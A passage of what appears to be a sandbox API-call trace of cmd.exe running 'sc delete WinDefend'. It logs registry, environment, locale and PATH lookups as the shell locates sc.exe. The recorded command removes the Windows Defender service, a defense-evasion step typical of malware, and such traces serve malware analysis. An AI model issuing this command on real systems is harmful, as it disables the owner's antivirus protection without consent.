	[0056.211] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1
	[0056.211] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.211] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0056.211] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.211] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0056.212] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.212] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0056.212] _get_osfhandle (_FileHandle=0) returned 0x3
	[0056.212] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0056.212] _get_osfhandle (_FileHandle=0) returned 0x3
	[0056.212] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0056.212] GetEnvironmentStringsW () returned 0x70250*
	[0056.212] GetProcessHeap () returned 0x60000
	[0056.212] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x8fa) returned 0x70b58
	[0056.213] FreeEnvironmentStringsW (penv=0x70250) returned 1
	[0056.213] GetProcessHeap () returned 0x60000
	[0056.213] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x4) returned 0x700d0
	[0056.213] GetEnvironmentStringsW () returned 0x70250*
	[0056.213] GetProcessHeap () returned 0x60000
	[0056.213] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x8fa) returned 0x71460
	[0056.213] FreeEnvironmentStringsW (penv=0x70250) returned 1
	[0056.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27e6f8 | out: phkResult=0x27e6f8*=0x40) returned 0x0
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x0, lpData=0x27e704*=0x0, lpcbData=0x27e6fc*=0x1000) returned 0x2
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x1, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x0, lpData=0x27e704*=0x1, lpcbData=0x27e6fc*=0x1000) returned 0x2
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x0, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x40, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x40, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.213] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x0, lpData=0x27e704*=0x40, lpcbData=0x27e6fc*=0x1000) returned 0x2
	[0056.214] RegCloseKey (hKey=0x40) returned 0x0
	[0056.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27e6f8 | out: phkResult=0x27e6f8*=0x40) returned 0x0
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x0, lpData=0x27e704*=0x40, lpcbData=0x27e6fc*=0x1000) returned 0x2
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x1, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x0, lpData=0x27e704*=0x1, lpcbData=0x27e6fc*=0x1000) returned 0x2
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x0, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x9, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x4, lpData=0x27e704*=0x9, lpcbData=0x27e6fc*=0x4) returned 0x0
	[0056.214] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27e700, lpData=0x27e704, lpcbData=0x27e6fc*=0x1000 | out: lpType=0x27e700*=0x0, lpData=0x27e704*=0x9, lpcbData=0x27e6fc*=0x1000) returned 0x2
	[0056.214] RegCloseKey (hKey=0x40) returned 0x0
	[0056.214] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf3b
	[0056.214] srand (_Seed=0x5cdadf3b) 
	[0056.214] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	[0056.214] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	[0056.214] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0056.215] GetProcessHeap () returned 0x60000
	[0056.215] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x210) returned 0x71d68
	[0056.215] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x71d70, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0056.215] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0056.215] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0056.215] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0056.215] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0056.215] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0056.216] GetProcessHeap () returned 0x60000
	[0056.216] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x70b58 | out: hHeap=0x60000) returned 1
	[0056.216] GetEnvironmentStringsW () returned 0x70250*
	[0056.216] GetProcessHeap () returned 0x60000
	[0056.216] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x912) returned 0x728a0
	[0056.216] FreeEnvironmentStringsW (penv=0x70250) returned 1
	[0056.216] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0056.216] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0056.216] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0056.216] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0056.216] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0056.216] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0056.216] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0056.216] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0056.216] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0056.216] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0056.216] GetProcessHeap () returned 0x60000
	[0056.216] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x30) returned 0x700e0
	[0056.216] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x27f4c4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0056.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x27f4c4, lpFilePart=0x27f4c0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x27f4c0*="system32") returned 0x13
	[0056.216] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0056.217] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x27f240 | out: lpFindFileData=0x27f240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x607f0
	[0056.217] FindClose (in: hFindFile=0x607f0 | out: hFindFile=0x607f0) returned 1
	[0056.217] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x27f240 | out: lpFindFileData=0x27f240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x607f0
	[0056.217] FindClose (in: hFindFile=0x607f0 | out: hFindFile=0x607f0) returned 1
	[0056.217] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0056.217] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0056.218] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0056.218] GetProcessHeap () returned 0x60000
	[0056.218] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x728a0 | out: hHeap=0x60000) returned 1
	[0056.218] GetEnvironmentStringsW () returned 0x70250*
	[0056.218] GetProcessHeap () returned 0x60000
	[0056.218] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x942) returned 0x71f80
	[0056.218] FreeEnvironmentStringsW (penv=0x70250) returned 1
	[0056.218] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0056.218] GetProcessHeap () returned 0x60000
	[0056.218] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x700e0 | out: hHeap=0x60000) returned 1
	[0056.218] GetProcessHeap () returned 0x60000
	[0056.218] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x400e) returned 0x73b10
	[0056.218] GetProcessHeap () returned 0x60000
	[0056.218] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x34) returned 0x700e0
	[0056.218] GetProcessHeap () returned 0x60000
	[0056.218] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x73b10 | out: hHeap=0x60000) returned 1
	[0056.219] GetConsoleOutputCP () returned 0x1b5
	[0056.338] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0056.338] GetUserDefaultLCID () returned 0x409
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x27f604, cchData=128 | out: lpLCData="0") returned 2
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x27f604, cchData=128 | out: lpLCData="0") returned 2
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x27f604, cchData=128 | out: lpLCData="1") returned 2
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0056.339] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2
	[0056.340] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2
	[0056.340] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0056.341] GetProcessHeap () returned 0x60000
	[0056.341] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x20c) returned 0x72908
	[0056.341] GetConsoleTitleW (in: lpConsoleTitle=0x72908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0056.341] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0056.342] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0056.342] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0056.342] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0056.342] GetProcessHeap () returned 0x60000
	[0056.342] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x400a) returned 0x73b10
	[0056.342] GetProcessHeap () returned 0x60000
	[0056.342] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x73b10 | out: hHeap=0x60000) returned 1
	[0056.342] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0056.343] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0056.343] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0056.343] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0056.343] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0056.343] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0056.343] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0056.343] GetProcessHeap () returned 0x60000
	[0056.343] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x58) returned 0x72b20
	[0056.343] GetProcessHeap () returned 0x60000
	[0056.343] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0xe) returned 0x6d5a8
	[0056.343] GetProcessHeap () returned 0x60000
	[0056.343] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x2c) returned 0x72b80
	[0056.344] GetConsoleTitleW (in: lpConsoleTitle=0x27f2fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0056.344] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0056.344] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0056.344] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0056.344] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0056.344] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0056.344] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0056.344] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0056.344] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0056.344] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0056.344] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0056.344] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0056.345] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0056.345] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0056.345] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0056.345] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0056.345] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0056.345] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0056.345] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0056.345] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0056.345] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0056.345] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0056.345] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0056.345] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0056.345] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0056.345] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0056.345] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0056.345] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0056.345] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0056.345] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0056.345] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0056.345] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0056.345] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0056.345] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0056.345] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0056.345] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0056.345] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0056.345] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0056.345] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0056.345] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0056.345] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0056.345] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0056.345] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0056.346] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0056.346] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0056.346] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0056.346] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0056.346] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0056.346] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0056.346] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0056.346] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0056.346] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0056.346] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0056.346] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0056.346] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0056.346] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0056.346] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0056.346] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0056.346] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0056.346] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0056.346] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0056.346] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0056.346] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0056.346] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0056.346] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0056.346] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0056.346] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0056.346] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0056.346] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0056.346] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0056.347] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0056.347] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0056.347] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0056.347] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0056.347] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0056.347] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0056.347] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0056.347] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0056.347] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0056.347] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0056.347] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0056.347] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0056.347] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0056.347] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0056.347] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0056.347] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0056.347] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0056.347] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0056.347] GetProcessHeap () returned 0x60000
	[0056.347] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x210) returned 0x72bb8
	[0056.347] GetProcessHeap () returned 0x60000
	[0056.347] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x32) returned 0x72dd0
	[0056.347] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0056.348] GetProcessHeap () returned 0x60000
	[0056.348] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x418) returned 0x607f0
	[0056.348] SetErrorMode (uMode=0x0) returned 0x0
	[0056.348] SetErrorMode (uMode=0x1) returned 0x0
	[0056.348] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x607f8, lpFilePart=0x27ee1c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x27ee1c*="system32") returned 0x13
	[0056.348] SetErrorMode (uMode=0x0) returned 0x1
	[0056.348] GetProcessHeap () returned 0x60000
	[0056.348] RtlReAllocateHeap (Heap=0x60000, Flags=0x0, Ptr=0x607f0, Size=0x36) returned 0x607f0
	[0056.348] GetProcessHeap () returned 0x60000
	[0056.348] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x607f0) returned 0x36
	[0056.348] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0056.348] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0056.349] GetProcessHeap () returned 0x60000
	[0056.349] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x144) returned 0x72e10
	[0056.349] GetProcessHeap () returned 0x60000
	[0056.349] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x280) returned 0x60830
	[0056.356] GetProcessHeap () returned 0x60000
	[0056.357] RtlReAllocateHeap (Heap=0x60000, Flags=0x0, Ptr=0x60830, Size=0x146) returned 0x60830
	[0056.357] GetProcessHeap () returned 0x60000
	[0056.357] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x60830) returned 0x146
	[0056.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0056.357] GetProcessHeap () returned 0x60000
	[0056.357] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0xe0) returned 0x72f60
	[0056.357] GetProcessHeap () returned 0x60000
	[0056.357] RtlReAllocateHeap (Heap=0x60000, Flags=0x0, Ptr=0x72f60, Size=0x76) returned 0x72f60
	[0056.357] GetProcessHeap () returned 0x60000
	[0056.357] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x72f60) returned 0x76
	[0056.358] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0056.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x27eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27eb98) returned 0x72fe0
	[0056.358] GetProcessHeap () returned 0x60000
	[0056.358] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0x73020
	[0056.358] FindClose (in: hFindFile=0x72fe0 | out: hFindFile=0x72fe0) returned 1
	[0056.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x27eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27eb98) returned 0xffffffff
	[0056.359] GetLastError () returned 0x2
	[0056.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x27eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27eb98) returned 0x72fe0
	[0056.359] GetProcessHeap () returned 0x60000
	[0056.359] RtlReAllocateHeap (Heap=0x60000, Flags=0x0, Ptr=0x73020, Size=0x4) returned 0x73020
	[0056.359] FindClose (in: hFindFile=0x72fe0 | out: hFindFile=0x72fe0) returned 1
	[0056.359] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0056.359] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0056.359] GetConsoleTitleW (in: lpConsoleTitle=0x27f090, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0056.359] InitializeProcThreadAttributeList (in: lpAttributeList=0x27ef18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x27efe0 | out: lpAttributeList=0x27ef18, lpSize=0x27efe0) returned 1
